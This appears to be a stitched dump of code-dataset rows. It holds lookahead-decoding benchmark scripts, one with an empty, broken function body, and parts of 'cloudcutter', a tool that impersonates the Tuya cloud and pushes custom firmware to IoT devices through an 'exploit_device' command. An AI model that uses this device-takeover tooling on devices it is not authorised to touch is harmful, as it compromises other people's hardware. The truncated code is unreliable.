import time
import lade
from datasets import load_dataset
from transformers import AutoTokenizer, AutoConfig, AutoModelForCausalLM, LlamaForCausalLM
from fastchat.model.model_adapter import Llama2Adapter, raise_warning_for_incompatible_cpu_offloading_configuration
The provided code snippet includes necessary dependencies for implementing the `reorg_answer_file` function. Write a Python function `def reorg_answer_file(answer_file)` to solve the following problem:
Sort by question id and de-duplication
Here is the function:
def reorg_answer_file(answer_file):
"""Sort by question id and de-duplication"""
answers = {}
with open(answer_file, "r") as fin:
for l in fin:
qid = json.loads(l)["question_id"]
answers[qid] = l
qids = sorted(list(answers.keys()))
with open(answer_file, "w") as fout:
for qid in qids:
fout.write(answers[qid]) | Sort by question id and de-duplication |
188,483 | import argparse
import json
import os
import random
import time
import shortuuid
import torch
from tqdm import tqdm
from typing import Dict, List, Optional
from fastchat.llm_judge.common import load_questions, temperature_config
from fastchat.model import get_conversation_template
from fastchat.utils import str_to_torch_dtype
import time
import lade
from datasets import load_dataset
from transformers import AutoTokenizer, AutoConfig, AutoModelForCausalLM, LlamaForCausalLM
from fastchat.model.model_adapter import Llama2Adapter, raise_warning_for_incompatible_cpu_offloading_configuration
def get_model_answers(
model_path,
model_id,
questions,
question_end,
answer_file,
max_new_token,
num_choices,
num_gpus_per_model,
max_gpu_memory,
dtype,
debug,
cache_dir,
cpu_offloading,
use_pp,
use_tp_ds,
use_tp,
use_flash,
do_sample
):
devices = os.environ.get("CUDA_VISIBLE_DEVICES", "0").split(",")
print("configuration: ", "flash attn: ", use_flash, " HF PP: ", use_pp, " DS TP: ", use_tp_ds, " GPUS: ", devices)
#tokenizer = AutoTokenizer.from_pretrained(model_path)
#cfg = AutoConfig.from_pretrained(model_path)
#cfg._flash_attn_2_enabled= use_flash
ds_local_rank = int(os.getenv('LOCAL_RANK', '0'))
if use_pp:
model, tokenizer = load_model(
model_path,
use_flash=use_flash,
device=f"cuda",
device_map="balanced",
num_gpus=num_gpus_per_model,
max_gpu_memory=max_gpu_memory,
dtype=dtype,
load_8bit=False,
cpu_offloading=cpu_offloading,
debug=debug,
)
elif use_tp_ds:
import deepspeed
torch.cuda.set_device(int(os.getenv('LOCAL_RANK', '0')))
model, tokenizer = load_model(
model_path,
use_flash=use_flash,
device_map="cpu",
num_gpus=num_gpus_per_model,
max_gpu_memory=max_gpu_memory,
dtype=dtype,
load_8bit=False,
cpu_offloading=cpu_offloading,
debug=debug,
)
model = deepspeed.init_inference(
model,
mp_size=int(os.getenv("WORLD_SIZE", "1")),
dtype=torch.half
)
else:
model, tokenizer = load_model(
model_path,
use_flash=use_flash,
device=f"cuda:{lade.get_device()}",
num_gpus=num_gpus_per_model,
max_gpu_memory=max_gpu_memory,
dtype=dtype,
load_8bit=False,
cpu_offloading=cpu_offloading,
debug=debug,
)
#model = AutoModelForCausalLM.from_pretrained(model_path, config=cfg, torch_dtype=torch.float16, device_map=lade.get_device())
model.tokenizer = tokenizer
overall_time = 0
overall_tp = 0
overall_gen = 0
count_gen = 0
stats = {}
for question_idx, description in enumerate(tqdm(questions["class_description"][:question_end])):
if not do_sample:
temperature = 0.0 #force greedy
stats[question_idx] = {} #
choices = []
for i in range(num_choices):
torch.manual_seed(i)
conv = get_conversation_template(model_id)
turns = []
prompts = []
for j in range(1):
qs = ""
import_stat = '\n'.join(questions["import_statement"][question_idx])
qs += import_stat
class_init = questions["class_constructor"][question_idx]
class_init_list = class_init.split('\n')
class_init_list[0] += " \n" + description
class_init = '\n'.join(class_init_list)
qs = qs + "\n" + class_init
prompt = qs
input_ids = tokenizer(prompt, return_tensors="pt",
max_length=1024, truncation=True).input_ids.to("cuda")
if temperature < 1e-4:
do_sample = False
else:
do_sample = True
# some models may error out when generating long outputs
if True:
start_time = time.time()
output_ids = model.generate(
input_ids,
do_sample=do_sample,
temperature=temperature,
max_new_tokens=max_new_token,
)
end_time = time.time()
gap_time = end_time - start_time
tokens = output_ids.numel() - input_ids.numel()
overall_time += gap_time
overall_gen += tokens
overall_tp += tokens / gap_time
count_gen += 1
stats[question_idx][j] = [gap_time, tokens]
if lade.get_device() == 0 and ds_local_rank == 0:
print([f"step {i} turn {j} time: ", gap_time, " generated tokens: ", tokens, " throughput: " , tokens / gap_time])
output = tokenizer.decode(
output_ids[0].tolist(),
skip_special_tokens=False,
)
turns.append(output)
prompts.append(prompt)
choices.append({"index": i, "turns": turns, "prompts" : prompts})
if lade.get_device() == 0 and ds_local_rank == 0:
# Dump answers
os.makedirs(os.path.dirname(answer_file), exist_ok=True)
with open(os.path.expanduser(answer_file), "a") as fout:
ans_json = {
"question_id": question_idx,
"answer_id": shortuuid.uuid(),
"model_id": model_id,
"choices": choices,
"tstamp": time.time(),
}
fout.write(json.dumps(ans_json) + "\n")
#if question_idx == 1:
# break
if lade.get_device() == 0 and ds_local_rank == 0:
torch.save(stats[question_idx], answer_file + ".pt")
print("LOG SAVE TO ", answer_file + ".pt")
print(f"AVERAGE THROUGHPUT1 {overall_tp / count_gen} AVERAGE THROUGHPUT2 {overall_gen / overall_time} STAT {[overall_tp, count_gen, overall_gen, overall_time]}")
lade.log_history()
lade.save_log(answer_file + "-lade-log.pt")
def run_eval(
model_path,
model_id,
question_file,
question_begin,
question_end,
answer_file,
max_new_token,
num_choices,
num_gpus_per_model,
num_gpus_total,
max_gpu_memory,
dtype,
debug,
cache_dir,
cpu_offloading,
use_pp,
use_tp,
use_tp_ds,
use_flash,
do_sample
):
#questions = load_questions(question_file, question_begin, question_end)
ClassEval = load_dataset("FudanSELab/ClassEval")
questions = ClassEval["test"]
# random shuffle the questions to balance the loading
###not shuffle
#random.shuffle(questions)
# Split the question file into `num_gpus` files
assert num_gpus_total % num_gpus_per_model == 0
get_answers_func = get_model_answers
chunk_size = len(questions) // (num_gpus_total // num_gpus_per_model)
ans_handles = []
for i in range(0, len(questions), chunk_size):
ans_handles.append(
get_answers_func(
model_path,
model_id,
questions[i : i + chunk_size],
question_end,
answer_file,
max_new_token,
num_choices,
num_gpus_per_model,
max_gpu_memory,
dtype=dtype,
debug=debug,
cache_dir=cache_dir,
cpu_offloading=cpu_offloading,
use_tp=use_tp,
use_pp=use_pp,
use_tp_ds=use_tp_ds,
use_flash=use_flash,
do_sample=do_sample
)
) | null |
188,485 | import argparse
import json
import os
import random
import time
import shortuuid
import torch
from tqdm import tqdm
from typing import Dict, List, Optional
from fastchat.llm_judge.common import load_questions, temperature_config
from fastchat.model import get_conversation_template
from fastchat.utils import str_to_torch_dtype
import time
import lade
from human_eval.data import write_jsonl, read_problems
from transformers import AutoTokenizer, AutoConfig, AutoModelForCausalLM, LlamaForCausalLM
from fastchat.model.model_adapter import Llama2Adapter, raise_warning_for_incompatible_cpu_offloading_configuration
def get_model_answers(
model_path,
model_id,
questions,
answer_file,
max_new_token,
num_choices,
num_gpus_per_model,
max_gpu_memory,
dtype,
debug,
cache_dir,
cpu_offloading,
use_pp,
use_tp_ds,
use_tp,
use_flash,
do_sample
):
def run_eval(
model_path,
model_id,
question_file,
question_begin,
question_end,
answer_file,
max_new_token,
num_choices,
num_gpus_per_model,
num_gpus_total,
max_gpu_memory,
dtype,
debug,
cache_dir,
cpu_offloading,
use_pp,
use_tp,
use_tp_ds,
use_flash,
do_sample
):
#questions = load_questions(question_file, question_begin, question_end)
questions = read_problems()
questions = list(questions.values())[question_begin:question_end]
# random shuffle the questions to balance the loading
###not shuffle
#random.shuffle(questions)
# Split the question file into `num_gpus` files
assert num_gpus_total % num_gpus_per_model == 0
get_answers_func = get_model_answers
chunk_size = len(questions) // (num_gpus_total // num_gpus_per_model)
ans_handles = []
for i in range(0, len(questions), chunk_size):
ans_handles.append(
get_answers_func(
model_path,
model_id,
questions[i : i + chunk_size],
answer_file,
max_new_token,
num_choices,
num_gpus_per_model,
max_gpu_memory,
dtype=dtype,
debug=debug,
cache_dir=cache_dir,
cpu_offloading=cpu_offloading,
use_tp=use_tp,
use_pp=use_pp,
use_tp_ds=use_tp_ds,
use_flash=use_flash,
do_sample=do_sample
)
) | null |
188,486 | import argparse
import json
import os
import random
import time
import shortuuid
import torch
from tqdm import tqdm
from typing import Dict, List, Optional
from fastchat.llm_judge.common import load_questions, temperature_config
from fastchat.model import get_conversation_template
from fastchat.utils import str_to_torch_dtype
import time
import lade
from human_eval.data import write_jsonl, read_problems
from transformers import AutoTokenizer, AutoConfig, AutoModelForCausalLM, LlamaForCausalLM
from fastchat.model.model_adapter import Llama2Adapter, raise_warning_for_incompatible_cpu_offloading_configuration
The provided code snippet includes necessary dependencies for implementing the `reorg_answer_file` function. Write a Python function `def reorg_answer_file(answer_file)` to solve the following problem:
Sort by question id and de-duplication
Here is the function:
def reorg_answer_file(answer_file):
"""Sort by question id and de-duplication"""
answers = {}
with open(answer_file, "r") as fin:
for l in fin:
qid = json.loads(l)["question_id"]
answers[qid] = l
qids = sorted(list(answers.keys()))
with open(answer_file, "w") as fout:
for qid in qids:
fout.write(answers[qid]) | Sort by question id and de-duplication |
188,487 | import argparse
import json
import os
import random
import time
import shortuuid
import torch
from tqdm import tqdm
from typing import Dict, List, Optional
from fastchat.llm_judge.common import load_questions, temperature_config
from fastchat.model import get_conversation_template
from fastchat.utils import str_to_torch_dtype
import time
import lade
from datasets import load_dataset
from transformers import AutoTokenizer, AutoConfig, AutoModelForCausalLM, LlamaForCausalLM
from fastchat.model.model_adapter import Llama2Adapter, raise_warning_for_incompatible_cpu_offloading_configuration
def get_model_answers(
model_path,
model_id,
questions,
answer_file,
max_new_token,
num_choices,
num_gpus_per_model,
max_gpu_memory,
dtype,
debug,
cache_dir,
cpu_offloading,
use_pp,
use_tp_ds,
use_tp,
use_flash,
do_sample
):
devices = os.environ.get("CUDA_VISIBLE_DEVICES", "0").split(",")
print("configuration: ", "flash attn: ", use_flash, " HF PP: ", use_pp, " DS TP: ", use_tp_ds, " GPUS: ", devices)
ds_local_rank = int(os.getenv('LOCAL_RANK', '0'))
if use_pp:
model, tokenizer = load_model(
model_path,
use_flash=use_flash,
device=f"cuda",
device_map="balanced",
num_gpus=num_gpus_per_model,
max_gpu_memory=max_gpu_memory,
dtype=dtype,
load_8bit=False,
cpu_offloading=cpu_offloading,
debug=debug,
)
elif use_tp_ds:
import deepspeed
torch.cuda.set_device(int(os.getenv('LOCAL_RANK', '0')))
model, tokenizer = load_model(
model_path,
use_flash=use_flash,
device_map="cpu",
num_gpus=num_gpus_per_model,
max_gpu_memory=max_gpu_memory,
dtype=dtype,
load_8bit=False,
cpu_offloading=cpu_offloading,
debug=debug,
)
model = deepspeed.init_inference(
model,
mp_size=int(os.getenv("WORLD_SIZE", "1")),
dtype=torch.half
)
else:
model, tokenizer = load_model(
model_path,
use_flash=use_flash,
device=f"cuda:{lade.get_device()}",
num_gpus=num_gpus_per_model,
max_gpu_memory=max_gpu_memory,
dtype=dtype,
load_8bit=False,
cpu_offloading=cpu_offloading,
debug=debug,
)
#model = AutoModelForCausalLM.from_pretrained(model_path, config=cfg, torch_dtype=torch.float16, device_map=lade.get_device())
model.tokenizer = tokenizer
overall_time = 0
overall_tp = 0
overall_gen = 0
count_gen = 0
stats = {}
for question_idx, question in enumerate(tqdm(questions)):
stats[question_idx] = {} #
choices = []
for i in range(num_choices):
torch.manual_seed(i)
conv = get_conversation_template(model_id)
turns = []
prompts = []
for j in range(1):
prompt = f'''[INST] <<SYS>>
You are an intelligent chatbot. Answer the questions only using the following context:
{question}
Here are some rules you always follow:
- Generate human readable output, avoid creating output with gibberish text.
- Generate only the requested output, don't include any other language before or after the requested output.
- Never say thank you, that you are happy to help, that you are an AI agent, etc. Just answer directly.
- Generate professional language typically used in business documents in North America.
- Never generate offensive or foul language.
<</SYS>>
Briefly summarize the given context. [/INST]
Summary: '''
prompts.append(prompt)
input_ids = tokenizer([prompt]).input_ids
#print("len: ", len(input_ids[0]))
if len(input_ids[0]) > 2048: #skip input len > 2048 tokens
continue
# some models may error out when generating long outputs
if True:
if do_sample:
start_time = time.time()
output_ids = model.generate(torch.as_tensor(input_ids).cuda(), max_new_tokens=max_new_token, do_sample=True, top_k=0, temperature=1.0, top_p=1.0)
end_time = time.time()
else:
start_time = time.time()
output_ids = model.generate(torch.as_tensor(input_ids).cuda(), max_new_tokens=max_new_token, do_sample=False, top_k=0)
end_time = time.time()
gap_time = end_time - start_time
tokens = output_ids.numel() - len(input_ids[0])
overall_time += gap_time
overall_gen += tokens
overall_tp += tokens / gap_time
count_gen += 1
stats[question_idx][j] = [gap_time, tokens]
if lade.get_device() == 0 and ds_local_rank == 0:
print([f"step {i} turn {j} time: ", gap_time, " generated tokens: ", tokens, " throughput: " , tokens / gap_time])
if model.config.is_encoder_decoder:
output_ids = output_ids[0]
else:
output_ids = output_ids[0][len(input_ids[0]) :]
# be consistent with the template's stop_token_ids
if conv.stop_token_ids:
stop_token_ids_index = [
i
for i, id in enumerate(output_ids)
if id in conv.stop_token_ids
]
if len(stop_token_ids_index) > 0:
output_ids = output_ids[: stop_token_ids_index[0]]
output = tokenizer.decode(
output_ids,
spaces_between_special_tokens=False,
)
if conv.stop_str and output.find(conv.stop_str) > 0:
output = output[: output.find(conv.stop_str)]
for special_token in tokenizer.special_tokens_map.values():
if isinstance(special_token, list):
for special_tok in special_token:
output = output.replace(special_tok, "")
else:
output = output.replace(special_token, "")
output = output.strip()
if conv.name == "xgen" and output.startswith("Assistant:"):
output = output.replace("Assistant:", "", 1).strip()
#print("output: ", output)
'''
except RuntimeError as e:
print("ERROR question ID: ", question["question_id"])
output = "ERROR"
'''
turns.append(output)
choices.append({"index": i, "turns": turns, "prompts" : prompts})
if lade.get_device() == 0 and ds_local_rank == 0:
# Dump answers
os.makedirs(os.path.dirname(answer_file), exist_ok=True)
with open(os.path.expanduser(answer_file), "a") as fout:
ans_json = {
"question_id": question_idx,
"answer_id": shortuuid.uuid(),
"model_id": model_id,
"choices": choices,
"tstamp": time.time(),
}
fout.write(json.dumps(ans_json) + "\n")
#if question_idx == 1:
# break
if lade.get_device() == 0 and ds_local_rank == 0:
torch.save(stats[question_idx], answer_file + ".pt")
print("LOG SAVE TO ", answer_file + ".pt")
print(f"AVERAGE THROUGHPUT1 {overall_tp / count_gen} AVERAGE THROUGHPUT2 {overall_gen / overall_time} STAT {[overall_tp, count_gen, overall_gen, overall_time]}")
lade.log_history()
lade.save_log(answer_file + "-lade-log.pt")
def run_eval(
model_path,
model_id,
question_file,
question_begin,
question_end,
answer_file,
max_new_token,
num_choices,
num_gpus_per_model,
num_gpus_total,
max_gpu_memory,
dtype,
debug,
cache_dir,
cpu_offloading,
use_pp,
use_tp,
use_tp_ds,
use_flash,
do_sample
):
questions = load_dataset("cnn_dailymail", "3.0.0", split="validation", streaming=False)["article"][question_begin:question_end]
# random shuffle the questions to balance the loading
###not shuffle
#random.shuffle(questions)
# Split the question file into `num_gpus` files
assert num_gpus_total % num_gpus_per_model == 0
get_answers_func = get_model_answers
chunk_size = len(questions) // (num_gpus_total // num_gpus_per_model)
ans_handles = []
for i in range(0, len(questions), chunk_size):
ans_handles.append(
get_answers_func(
model_path,
model_id,
questions[i : i + chunk_size],
answer_file,
max_new_token,
num_choices,
num_gpus_per_model,
max_gpu_memory,
dtype=dtype,
debug=debug,
cache_dir=cache_dir,
cpu_offloading=cpu_offloading,
use_tp=use_tp,
use_pp=use_pp,
use_tp_ds=use_tp_ds,
use_flash=use_flash,
do_sample=do_sample
)
) | null |
188,489 | import base64
import datetime
import json
import os
import sys
import time
from typing import List
import tornado
from cloudcutter.protocol import mqtt
from ..crypto.tuyacipher import TuyaCipher, TuyaCipherKeyChoice
from ..device import DeviceConfig
from ..utils import object_to_json
from .transformers import ResponseTransformer
device_mac = ""
def log_request(endpoint, request, decrypted_request_body, verbose_output: bool = False):
clean_request_body: str = ""
if len(request.body) > 0 or len(decrypted_request_body) > 0:
if (decrypted_request_body is not None):
clean_request_body = decrypted_request_body
else:
clean_request_body = request.body
if type(clean_request_body) == bytes:
clean_request_body = clean_request_body.decode()
try:
body_json = json.loads(clean_request_body)
if body_json['hid'] is not None:
mac_str = body_json['hid']
mac_iter = iter(mac_str)
global device_mac
device_mac = ':'.join(a+b for a, b in zip(mac_iter, mac_iter))
except:
pass
if verbose_output:
# print a blank line for easier reading
print("")
print(f'[{datetime.datetime.now().time()} Log (Client)] Request: {request}')
if len(clean_request_body) > 0:
print(f'[{datetime.datetime.now().time()} LOG (Client)] ==== Request body ===')
print(clean_request_body)
print(f'[{datetime.datetime.now().time()} LOG (Client)] ==== End request body ===')
else:
print(f"Processing endpoint {endpoint}") | null |
188,490 | import base64
import datetime
import json
import os
import sys
import time
from typing import List
import tornado
from cloudcutter.protocol import mqtt
from ..crypto.tuyacipher import TuyaCipher, TuyaCipherKeyChoice
from ..device import DeviceConfig
from ..utils import object_to_json
from .transformers import ResponseTransformer
def log_response(response, verbose_output: bool = False):
if verbose_output:
print(f'[{datetime.datetime.now().time()} LOG (Server)] Response: ', response) | null |
188,491 | import json
def object_to_json(obj):
return json.dumps(obj, separators=(',', ':')) | null |
188,492 | import argparse
from datetime import datetime, timedelta
import hmac
import json
import os
import re
import sys
import time
from hashlib import sha256
from traceback import print_exc
import tornado.httpserver
import tornado.ioloop
import tornado.web
from tornado.log import enable_pretty_logging
import tinytuya.tinytuya as tinytuya
from .crypto.pskcontext import PSKContext
from .device import DEFAULT_AUTH_KEY, DeviceConfig
from .exploit import (build_network_config_packet, exploit_device_with_config,
create_device_specific_config, send_network_config_datagram)
from .protocol import handlers, mqtt
from .protocol.transformers import ResponseTransformer
def __configure_local_device_or_update_firmware(args, update_firmware: bool = False):
if not os.path.exists(args.config):
print(f"Configuration file {args.config} does not exist", file=sys.stderr)
sys.exit(10)
if not os.path.isfile(args.profile):
print(f"Provided device profile JSON {args.profile} does not exist, or is not a file", file=sys.stderr)
sys.exit(30)
config = DeviceConfig.read(args.config)
authkey, uuid, pskkey = config.get_bytes(DeviceConfig.AUTH_KEY, default=DEFAULT_AUTH_KEY), config.get_bytes(DeviceConfig.UUID), config.get_bytes(DeviceConfig.PSK, default="")
if len(pskkey) == 0:
pskkey = None
context = PSKContext(authkey=authkey, uuid=uuid, psk=pskkey)
device_id, local_key = config.get(DeviceConfig.DEVICE_ID), config.get(DeviceConfig.LOCAL_KEY)
flash_timeout = 15
if args.flash_timeout is not None:
flash_timeout = args.flash_timeout
mqtt.mqtt_connect(device_id, local_key, tornado.ioloop.IOLoop.current(), graceful_exit_timeout=flash_timeout, verbose_output=args.verbose_output)
with open(args.profile, "r") as f:
combined = json.load(f)
device = combined["device"]
def trigger_payload_endpoint_hook(handler, *_):
if update_firmware:
task_function = __trigger_firmware_update
task_args = (config, args)
else:
task_args = (handler.request.remote_ip, config, args.ssid, args.password)
task_function = __configure_ssid_on_device
tornado.ioloop.IOLoop.current().call_later(0, task_function, *task_args)
return None
def upgrade_endpoint_hook(handler, *_):
global payload_trigger_time
# Don't allow duplicates in a short period of time, but allow re-triggering if a new connection is made.
if payload_trigger_time is not None and payload_trigger_time + timedelta(minutes=1) > datetime.now():
print("Discarding duplicate upgrade request to avoid race condition.")
return { "result": { "success": True, "t": int(time.time()) }}
payload_trigger_time = datetime.now()
with open(args.firmware, "rb") as fs:
upgrade_data = fs.read()
sec_key = config.get_bytes(DeviceConfig.SEC_KEY)
file_sha = sha256(upgrade_data).hexdigest().upper().encode("utf-8")
file_hmac = hmac.digest(sec_key, file_sha, sha256).hex().upper()
firmware_filename = os.path.basename(args.firmware)
return {
"result": {
"url": f"http://{args.ip}:80/files/{firmware_filename}",
"hmac": file_hmac,
"version": "9.0.0",
"size": str(len(upgrade_data)),
"type": 0,
},
"success": True,
"t": int(time.time())
}
def active_endpoint_hook(handler, *_):
# active should reset payload trigger time, in case the device reconnected and asked to activate.
global payload_trigger_time
payload_trigger_time = None
schema_id, schema = list(device["schemas"].items())[0]
# Trigger the payload after active has fully registered.
tornado.ioloop.IOLoop.current().call_later(2, trigger_payload_endpoint_hook, *(handler, None))
return {
"result": {
"schema": json.dumps(schema, separators=(',', ':')),
"devId": "DUMMY",
"resetFactory": False,
"timeZone": "+02:00",
"capability": 1025,
"secKey": "DUMMY",
"stdTimeZone": "+01:00",
"schemaId": schema_id,
"dstIntervals": [],
"localKey": "DUMMY",
},
"success": True,
"t": int(time.time())
}
response_transformers = __configure_local_device_response_transformers(config)
endpoint_hooks = {
"tuya.device.active": active_endpoint_hook,
}
if update_firmware:
endpoint_hooks.update({
"tuya.device.upgrade.get": upgrade_endpoint_hook,
"tuya.device.upgrade.silent.get": upgrade_endpoint_hook,
})
application = tornado.web.Application([
(r'/v1/url_config', handlers.GetURLHandlerV1, dict(ipaddr=args.ip, verbose_output=args.verbose_output)),
(r'/v2/url_config', handlers.GetURLHandlerV2, dict(ipaddr=args.ip, verbose_output=args.verbose_output)),
# 2018 SDK specific endpoint
(r'/device/url_config', handlers.OldSDKGetURLHandler, dict(ipaddr=args.ip, verbose_output=args.verbose_output)),
(r'/d.json', handlers.DetachHandler, dict(schema_directory=args.schema, response_transformers=response_transformers, config=config, endpoint_hooks=endpoint_hooks, verbose_output=args.verbose_output)),
(f'/files/(.*)', handlers.OTAFilesHandler, dict(path="/work/custom-firmware/", graceful_exit_timeout=args.flash_timeout, verbose_output=args.verbose_output)),
])
http_server = tornado.httpserver.HTTPServer(application)
http_server.listen(80)
https_server = tornado.httpserver.HTTPServer(application, ssl_options=context)
https_server.listen(443)
# 2018 SDK seems to request that port for some reason
dns_https_server = tornado.httpserver.HTTPServer(application, ssl_options=context)
dns_https_server.listen(4433)
tornado.ioloop.IOLoop.current().start()
sys.exit(0)
def __update_firmware(args):
if not os.path.isfile(args.firmware):
# try as a relative path
args.firmware = os.path.join(args.firmware_dir, args.firmware)
if not os.path.isfile(args.firmware):
print(f"Firmware {args.firmware} does not exist or not a file.", file=sys.stderr)
sys.exit(50)
UG_FILE_MAGIC = b"\x55\xAA\x55\xAA"
FILE_MAGIC_DICT = {
b"RBL\x00": "RBL",
b"\x43\x09\xb5\x96": "QIO",
b"\x2f\x07\xb5\x94": "UA"
}
with open(args.firmware, "rb") as fs:
magic = fs.read(4)
error_code = 0
if magic in FILE_MAGIC_DICT:
print(f"Firmware {args.firmware} is an {FILE_MAGIC_DICT[magic]} file! Please provide a UG file.", file=sys.stderr)
error_code = 51
elif magic != UG_FILE_MAGIC:
print(f"Firmware {args.firmware} is not a UG file.", file=sys.stderr)
error_code = 52
else:
# File is a UG file
error_code = 0
pass
if error_code != 0:
sys.exit(error_code)
__configure_local_device_or_update_firmware(args, update_firmware=True)
def __exploit_device(args):
output_dir = args.output_directory
if not (os.path.exists(output_dir) and os.path.isdir(output_dir)):
print(f"Provided output directory {output_dir} does not exist or not a directory", file=sys.stderr)
sys.exit(60)
try:
with open(args.profile, "r") as fs:
combined = json.load(fs)
except (OSError, KeyError):
print(f"Could not load profile {args.profile}. Are you sure the profile file exists and is a valid combined JSON?", file=sys.stderr)
sys.exit(65)
device_config = exploit_device_with_config(args, combined)
device_uuid = device_config.get(DeviceConfig.UUID)
output_path = os.path.join(output_dir, f"{device_uuid}.deviceconfig")
device_config.write(output_path)
print("Exploit run, saved device config too!")
# To communicate with external scripts
print(f"output={output_path}")
def __write_deviceconfig(args):
output_dir = args.output_directory
if not (os.path.exists(output_dir) and os.path.isdir(output_dir)):
print(f"Provided output directory {output_dir} does not exist or not a directory", file=sys.stderr)
sys.exit(60)
try:
with open(args.profile, "r") as fs:
combined = json.load(fs)
except (OSError, KeyError):
print(f"Could not load profile {args.profile}. Are you sure the profile file exists and is a valid combined JSON?", file=sys.stderr)
sys.exit(65)
device_config = create_device_specific_config(args, combined, args.uuid, args.auth_key, args.psk_key)
output_path = os.path.join(output_dir, f"{args.uuid}.deviceconfig")
device_config.write(output_path)
print("Saved device config.")
# To communicate with external scripts
print(f"output={output_path}")
def __configure_wifi(args):
SSID = args.SSID
password = args.password
# Pass the payload through the json module specifically
# to avoid issues with special chars (e.g. ") in either
# SSIDs or passwords.
payload = {"ssid": SSID, "token": "AAAAAAAA"}
# Configure the password ONLY if it's present
# Some devices may parse incorrectly otherwise
if password:
payload["passwd"] = password
payload = json.dumps(payload)
datagram = build_network_config_packet(payload.encode('ascii'))
# Send the configuration diagram a few times with minor delay
# May improve reliability in some setups
for _ in range(5):
send_network_config_datagram(datagram)
time.sleep(0.300)
print(f"Configured device to connect to '{SSID}'")
def __validate_localapicredential_arg(length):
def check_arg(value):
if (len(value) == 0):
return value
elif (len(value) != length):
raise argparse.ArgumentTypeError("%s length is invalid, it must be %s characters long" % value, length)
elif (not re.compile('[a-zA-Z0-9]').match(value)):
raise argparse.ArgumentTypeError("%s value is invalid, it must contain only letters or numbers" % value)
return value
return check_arg
def parse_args():
parser = argparse.ArgumentParser(
prog="cloudcutter",
description="Detach tuya devices from the cloud or install custom firmware on them",
)
subparsers = parser.add_subparsers(dest="command", required=True, help="subcommand to execute")
parser_configure = subparsers.add_parser("configure_local_device", help="Configure detached device with local keys and onboard it on desired WiFi AP")
parser_configure.add_argument("profile", help="Device profile directory to use for detaching")
parser_configure.add_argument("schema", help="Endpoint schemas directory to use for detaching")
parser_configure.add_argument("config", help="Device configuration file")
parser_configure.add_argument("flash_timeout", help="Not used for cutting mode", type=int)
parser_configure.add_argument("verbose_output", help="Flag for more verbose output, 'true' for verbose output", type=bool)
parser_configure.add_argument(
"--ip",
dest="ip",
default="10.42.42.1",
help="IP address to listen on and respond to the devices with (default: 10.42.42.1)",
)
parser_configure.add_argument(
"--ssid",
required=True,
help="SSID that the device will be onboarded on after configuration",
)
parser_configure.add_argument(
"--password",
required=False,
default="",
help="Password of the SSID for device onboarding (default: empty)",
)
parser_configure.set_defaults(handler=__configure_local_device_or_update_firmware)
parser_update_firmware = subparsers.add_parser("update_firmware", help="Update the device's firmware")
parser_update_firmware.add_argument("profile", help="Device profile JSON file (combined)")
parser_update_firmware.add_argument("schema", help="Endpoint schemas directory to use for updating")
parser_update_firmware.add_argument("config", help="Device configuration file")
parser_update_firmware.add_argument("firmware_dir", help="Directory containing firmware images")
parser_update_firmware.add_argument("firmware", help="OTA firmware image to update the device to")
parser_update_firmware.add_argument("flash_timeout", help="Number of seconds to wait before exiting after receiving flash", type=int)
parser_update_firmware.add_argument("verbose_output", help="Flag for more verbose output, 'true' for verbose output", type=bool)
parser_update_firmware.add_argument(
"--ip",
dest="ip",
default="10.42.42.1",
help="IP address to listen on and respond to the devices with (default: 10.42.42.1)",
)
parser_update_firmware.set_defaults(handler=__update_firmware)
parser_exploit_device = subparsers.add_parser(
"exploit_device",
help="Exploit a device - requires that the attacking system is on the device's AP"
)
parser_exploit_device.add_argument("profile", help="Device profile JSON file (combined)")
parser_exploit_device.add_argument("verbose_output", help="Flag for more verbose output, 'true' for verbose output", type=bool)
parser_exploit_device.add_argument(
"--output-directory",
dest="output_directory",
required=False,
default="/work/configured-devices",
help="A directory to which the modified device parameters file will be written (default: <workdir>/configured-devices)"
)
parser_exploit_device.add_argument(
"--deviceid",
dest="device_id",
required=False,
default="",
help="deviceid assigned to the device (default: Random)",
type=__validate_localapicredential_arg(20),
)
parser_exploit_device.add_argument(
"--localkey",
dest="local_key",
required=False,
default="",
help="localkey assigned to the device (default: Random)",
type=__validate_localapicredential_arg(16),
)
parser_exploit_device.set_defaults(handler=__exploit_device)
parser_write_deviceconfig = subparsers.add_parser(
"write_deviceconfig",
help="Write the deviceconfig to use to for Tuya API emulation."
)
parser_write_deviceconfig.add_argument("profile", help="Device profile JSON file (combined)")
parser_write_deviceconfig.add_argument("verbose_output", help="Flag for more verbose output, 'true' for verbose output", type=bool)
parser_write_deviceconfig.add_argument(
"--output-directory",
dest="output_directory",
required=False,
default="/work/configured-devices",
help="A directory to which the modified device parameters file will be written (default: <workdir>/configured-devices)"
)
parser_write_deviceconfig.add_argument(
"--deviceid",
dest="device_id",
required=False,
default="",
help="deviceid assigned to the device (default: Random)",
type=__validate_localapicredential_arg(20),
)
parser_write_deviceconfig.add_argument(
"--localkey",
dest="local_key",
required=False,
default="",
help="localkey assigned to the device (default: Random)",
type=__validate_localapicredential_arg(16),
)
parser_write_deviceconfig.add_argument(
"--authkey",
dest="auth_key",
required=True,
default="",
help="authkey assigned to the device (default: Random)",
type=__validate_localapicredential_arg(32),
)
parser_write_deviceconfig.add_argument(
"--uuid",
dest="uuid",
required=True,
default="",
help="uuid assigned to the device (default: Random)",
type=__validate_localapicredential_arg(16),
)
parser_write_deviceconfig.add_argument(
"--pskkey",
dest="psk_key",
required=True,
default="",
help="pskkey assigned to the device (default: Random)",
type=__validate_localapicredential_arg(37),
)
parser_write_deviceconfig.set_defaults(handler=__write_deviceconfig)
parser_configure_wifi = subparsers.add_parser(
"configure_wifi",
help="Makes a device to which you're connected via its AP mode join a given WiFi network"
)
parser_configure_wifi.add_argument("SSID", help="WiFi access point name to make the device join")
parser_configure_wifi.add_argument("password", help="WiFi access point password")
parser_configure_wifi.add_argument("verbose_output", help="Flag for more verbose output, 'true' for verbose output", type=bool)
parser_configure_wifi.set_defaults(handler=__configure_wifi)
return parser.parse_args() | null |
188,493 | import random
import socket
import string
import struct
import time
import zlib
from distutils.command.config import config
from typing import Dict
from .device import DeviceConfig
def encode_json_val(value):
encoded = []
escaped = list(map(ord, '"\\'))
escape_char = ord('\\')
for i in value:
if i in escaped:
encoded.append(escape_char)
encoded.append(i)
return bytes(encoded) | null |
188,494 | import base64
import json
import socket
import ssl
import sys
import time
import os
import tornado.httpserver
import tornado.ioloop
import tornado.web
from pskcontext import PSKContext
from tuyacipher import TuyaCipher, TuyaCipherKeyChoice
import hmac
from hashlib import sha256
def object_to_json(obj):
return json.dumps(obj, separators=(',',':')) | null |
188,495 | import base64
import json
import socket
import ssl
